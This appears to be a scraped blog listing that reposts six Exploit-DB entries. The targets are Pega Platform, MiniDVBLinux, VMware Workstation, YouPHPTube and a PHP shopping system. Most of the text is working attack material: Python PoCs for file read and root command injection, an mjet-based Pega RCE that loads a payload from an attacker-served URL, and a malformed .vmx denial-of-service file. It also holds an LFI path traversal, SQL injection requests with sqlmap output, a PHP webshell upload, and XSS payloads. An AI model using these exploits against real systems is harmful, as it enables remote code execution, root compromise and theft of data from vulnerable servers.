https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  20. HireHackking

    Pega Platform 8.1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Pega Platform 8.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 20 Oct 2022 # Exploit Author: Marcin Wolak (using MOGWAI LABS JMX Exploitation Toolkit) # Vendor Homepage: www.pega.com # Software Link: Not Available # Version: 8.1.0 on-premise and higher, up to 8.3.7 # Tested on: Red Hat Enterprise 7 # CVE : CVE-2022-24082 ;Dumping RMI registry: nmap -sT -sV --script rmi-dumpregistry -p 9999 <IP Address> ;Extracting dynamic TCP port number from the dump (in form of @127.0.0.1 :<PORT>) ;Verifying that the <PORT> is indeed open (it gives 127.0.0.1 in the RMI dump, but actually listens on the network as well): nmap -sT -sV -p <PORT> <IP Address> ;Exploitation requires: ;- JVM ;- MOGWAI LABS JMX Exploitation Toolkit (https://github.com/mogwailabs/mjet) ;- jython ;Installing mbean for remote code execution java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 install random_password http://<Local IP to Serve Payload over HTTP>:6666 6666 ;Execution of commands id & ifconfig java -jar jython-standalone-2.7.2.jar mjet.py --localhost_bypass <PORT> <IP Address> 9999 command random_password "id;ifconfig" ;More details: https://medium.com/@Marcin-Wolak/cve-2022-24082-rce-in-the-pega-platform-discovery-remediation-technical-details-long-live-69efb5437316 Kind Regards, Marcin Wolak
  21. HireHackking

    MiniDVBLinux 5.4 - Arbitrary File Read

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux 5.4 - Arbitrary File Read # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Arbitrary File Read Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The distribution suffers from an arbitrary file disclosure # vulnerability. Using the 'file' GET parameter attackers can disclose # arbitrary files on the affected device and disclose sensitive and system # information. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5719 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT if len(sys.argv) < 3: print('MiniDVBLinux 5.4 File Disclosure PoC') print('Usage: ./mldhd_fd.py [url] [file]') sys.exit(17) else: url = sys.argv[1] fil = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file='+fil) outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))
  22. HireHackking

    MiniDVBLinux 5.4 - Remote Root Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniDVBLinux 5.4 - Remote Root Command Injection # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command injection vulnerability. # This can be exploited to execute arbitrary commands with root privileges. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5717 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT #test case 004 #http://ip:8008/?site=about&name=blind&file=$(id) #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory #test case 005 #http://ip:8008/?site=about&name=blind&file=`id` #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('<pre>','').replace('</pre>',''))
  23. HireHackking

    VMware Workstation 15 Pro - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    #Title: VMware Workstation 15 Pro - Denial of Service #Author: Milad Karimi #Date: 2022-10-17 #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506) #Affected: VMware Workstation Pro/Player 15.x config.version = "8" virtualHW.version = "4" displayName = "credit's to Ex3ptionaL for find this vouln" annotation = "Live CD ISO http://www.irongeek.com" guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln" guestinfo.vmware.product.url = "http://www.millw0rm.com" guestinfo.vmware.product.short = "LCDI" guestinfo.vmware.product.version.major = "1" guestinfo.vmware.product.version.minor = "0" guestinfo.vmware.product.version.revision = "0" guestinfo.vmware.product.version.type = "release" guestinfo.vmware.product.class = "virtual machine" guestinfo.vmware.product.build = "1.0.0rc8-20051212" uuid.action = "create" guestOS = "winxppro" ##### # Memory ##### memsize = "20000000000000" # memsize = "300000000000000000000000000000" # memsize = "400000000000000000000" # memsize = "700000000000000000000000000000000000" # # Alternative larger memory allocations ##### # USB ##### usb.present = "TRUE" ##### # Floppy ##### floppy0.present = "FALSE" ##### # IDE Storage ##### ide1:0.present = "TRUE" #Edit line below to change ISO to boot from ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso" ide1:0.deviceType = "cdrom-image" ide1:0.startConnected = "TRUE" ide1:0.autodetect = "TRUE" ##### # Network ##### ethernet0.present = "TRUE" ethernet0.connectionType = "nat" # ethernet0.connectionType = "bridged" # # Switch these two to enable "Bridged" vs. "NAT" ##### # Sound ##### sound.present = "TRUE" sound.virtualDev = "es1371" sound.autoDetect = "TRUE" sound.fileName = "-1" ##### # Misc. # # (normal) high priority.grabbed = "high" tools.syncTime = "TRUE" workingDir = "." # # (16) 32 64 sched.mem.pShare.checkRate = "32" # # (32) 64 128 sched.mem.pshare.scanRate = "64" # # Higher resolution lockout, adjust values to exceed 800x600 svga.maxWidth = "8000000000000000000" svga.maxHeight = "6000000000000000000" # # (F) T isolation.tools.dnd.disable = "FALSE" # # (F) T isolation.tools.hgfs.disable = "FALSE" # # (F) T isolation.tools.copy.disable = "FALSE" # # (F) T isolation.tools.paste.disable = "FALSE" # # (T) F logging = "TRUE" # # # (F) T log.append = "FALSE" # # (3) number of older files kept log.keepOld = "1" # # (0) microseconds keyboard.typematicMinDelay = 100000000000000000 uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a" ethernet0.addressType = "generated" ethernet0.generatedAddress = "00:0c:29:3c:d4:4a" ethernet0.generatedAddressOffset = "0" checkpoint.vmState = "live-cd-iso.vmss" tools.remindInstall = "TRUE" Exploit code() buffer = "A" * 118000000000000000 payload = buffer try: f=open("PoC.vmx","w") print "[+] Creating %s evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  24. HireHackking

    YouPHPTube<= 7.8 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: YouPHPTube <= 7.8 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2021-01-31 # Vendor Homepage: https://www.youphptube.com/ # Software Link : https://www.youphptube.com/ # Tested Version: 7.8 # Tested on: Windows 7, 10 using XAMPP # Vulnerability Type: LFI + Path Traversal CVSS v3: 7.5 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CWE: CWE-829, CWE-22 Vulnerability description: YouPHPTube v7.8 allows unauthenticated directory traversal and Local File Inclusion through the parameter in an /?lang=PATH+TRAVERSAL+FILE (without php) GET request because of an include_once in locale/function.php page. Proof of concept: To detect: http://localhost/youphptube/index.php?lang=) An error is generated: Warning: preg_grep(): Compilation failed: unmatched parentheses at offset 0 in C:\xampp\htdocs\YouPHPTube\locale\function.php on line 47 In function.php page, we can see: // filter some security here if (!empty($_GET['lang'])) { $_GET['lang'] = str_replace(array("'", '"', """, "&#039;"), array('', '', '', ''), xss_esc($_GET['lang'])); } if (empty($_SESSION['language'])) { $_SESSION['language'] = $config->getLanguage(); } if (!empty($_GET['lang'])) { $_GET['lang'] = strip_tags($_GET['lang']); $_SESSION['language'] = $_GET['lang']; } @include_once "{$global['systemRootPath']}locale/{$_SESSION['language']}.php"; The parameter "lang" can be modified and load a php file in the server. In Document root: /phpinfo.php with this content: <?php echo phpinfo(); ?> To Get phpinfo.php: http://127.0.0.1/youphptube/?lang=../../phpinfo Note: phpinfo without ".php". The new Path is: @include_once "{$global['systemRootPath']}locale/../../phpinfo.php"; And you can see the PHP information into the browser. # Vulnerability Type: reflected Cross-Site Scripting (XSS) CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: YouPHPTube 7.8 and before, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the /<YouPHPTube_path_directory>/signup?redirectUri=<XSS>, in redirectUri parameter. Proof of concept: http://localhost/ <YouPHPTube_path_directory>/signup?redirectUri='"()%26%25<ScRipt>alert(1)</ScRipt>
  25. HireHackking

    Online shopping system advanced 1.0 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online shopping system advanced 1.0 - Multiple Vulnerabilities # Discovery by: Rafael Pedrero # Discovery Date: 2020-09-24 # Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software Link : https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip # Tested Version: 1.0 # Tested on: Windows 10 using XAMPP / Linux Ubuntu server 18.04 + Apache + php 5.X/7.X + MySQL # Recap: SQLi = 2, RCE = 1, stored XSS = 2, reflected XSS = 2: 7 vulnerabilities # Vulnerability Type: SQL Injection - #1 CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-89 Vulnerability description: Online shopping system advanced 1.0 allows SQL injection via the admin/edit_user.php, user_id parameter. Proof of concept: Save this content in a file: POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------120411781422335 Content-Length: 489 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25 -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" puneeth@123 -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p user_id (custom) POST parameter 'MULTIPART user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 115 HTTP(s) requests: --- Parameter: MULTIPART user_id ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25' AND SLEEP(5) AND 'HGWF'='HGWF -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" puneeth@123 -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- --- [16:25:28] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.38, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 # Vulnerability Type: SQL Injection - #2 CVSS v3: 9.8 CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-89 Vulnerability description: Online shopping system advanced 1.0 allows SQL injection via the action.php, proId parameter. Proof of concept: Save this content in a file: POST http://127.0.0.1/online/action.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/ Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Host: 127.0.0.1 addToCart=1&proId=70 And execute SQLMAP: >python sqlmap.py -r 1.txt --dbms=mysql -p proId POST parameter 'proId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests: --- Parameter: proId (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: addToCart=1&proId=70' AND 7704=7704 AND 'IGsd'='IGsd Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: addToCart=1&proId=70' AND SLEEP(5) AND 'pAwv'='pAwv --- [16:03:38] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.38, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 # Vulnerability Type: Remote Command Execution (RCE) CVSS v3: 9.8 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE: CWE-434 Vulnerability description: File Restriction Bypass vulnerabilities were found in Online shopping system advanced v1.0. This allows for an authenticated user to potentially obtain RCE via webshell. Proof of concept: 1. Go the add product >> (admin/add_product.php) 2.- Select product image and load a valid image. 3. Turn Burp/ZAP Intercept On 4. Select webshell - ex: shell.php 5. Alter request in the upload... Update 'filename' to desired extension. ex: shell.php Not neccesary change content type to 'image/png' Example exploitation request: ==================================================================================================== POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------184982084830387 Content-Length: 960 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/add_product.php Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------184982084830387 Content-Disposition: form-data; name="product_name" demo2 -----------------------------184982084830387 Content-Disposition: form-data; name="details" demo2 -----------------------------184982084830387 Content-Disposition: form-data; name="picture"; filename="shell.php" Content-Type: image/gif <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> -----------------------------184982084830387 Content-Disposition: form-data; name="price" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="product_type" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="brand" 1 -----------------------------184982084830387 Content-Disposition: form-data; name="tags" Summet -----------------------------184982084830387 Content-Disposition: form-data; name="submit" -----------------------------184982084830387-- ==================================================================================================== 6. To view the webshell path go to Product List (admin/cosmetics_list.php) 7. Send the request and visit your new webshell Ex: http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami nt authority\system # Vulnerability Type: stored Cross-Site Scripting (XSS) - #1 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in multiple parameter. Proof of concept: Stored: POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: multipart/form-data; boundary=---------------------------120411781422335 Content-Length: 496 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25 Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 -----------------------------120411781422335 Content-Disposition: form-data; name="user_id" 25 -----------------------------120411781422335 Content-Disposition: form-data; name="email" otheruser@gmail.com -----------------------------120411781422335 Content-Disposition: form-data; name="password" </td><script>alert(1);</script><td> -----------------------------120411781422335 Content-Disposition: form-data; name="btn_save" -----------------------------120411781422335-- # Vulnerability Type: stored Cross-Site Scripting (XSS) - #2 CVSS v3: 6.5 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in multiple parameter. Proof of concept: Stored: POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded Content-Length: 192 Origin: http://127.0.0.1 Connection: keep-alive Referer: http://127.0.0.1/online/admin/add_user.php Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263 Upgrade-Insecure-Requests: 1 Host: 127.0.0.1 first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save= # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1 CVSS v3: 6.1 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in page parameter. Proof of concept: Reflected: http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E # Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2 CVSS v3: 6.1 CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CWE: CWE-79 Vulnerability description: Online shopping system advanced v1.0, does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php, in page parameter. Proof of concept: Reflected: http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E